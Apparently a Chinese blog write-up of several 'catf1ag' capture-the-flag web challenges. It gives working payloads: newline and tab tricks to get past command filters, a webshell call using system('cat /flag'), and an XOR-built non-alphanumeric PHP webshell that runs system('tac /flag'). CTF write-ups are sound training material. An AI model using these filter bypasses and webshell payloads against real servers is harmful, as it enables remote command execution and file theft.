catf1ag Web writeup(wp) 可能会持续更新

文章目录

命令执行之我在干什么

换行绕过strstr,%09绕空格
a=yyds%0als%09/
看见flag在根目录,但是过滤了*和flag
用正则

?a=yyds%0Anl%09/fla[g]

签到题

源代码

webshell

网站被黑了,发现robots.txt,访问里面的地址,源代码有个aGFja2Vy
base解码得到hacker
于是传

webshe11.php?hacker=system('cat /flag');

其次,我发现扫描有一个1.txt,直接访问就是flag,应该是哪位好心人写的。
所以我也好心的删掉了。

无字符webshell

过滤A-Za-z0-9
参考浅析无字符数字构造webshell
采用里面的异或,即

$_="`{
  {
  {"^"?<>/";${$_}[_](${$_}[__]);
#$_GET[_]($_GET[__])

于是得到最终payload

?cmd=$_="`{
  {
  {"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=system('tac /flag');

当然如果你是在我写wp之前做的,你会发现这道题直接访问flag.txt就可以拿到flag了,而我看我以前的payload是tac f111ag。
为了继续当好心人,我就好心的mv flag.txt /flag,这样大家就能学习到无字符webs

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值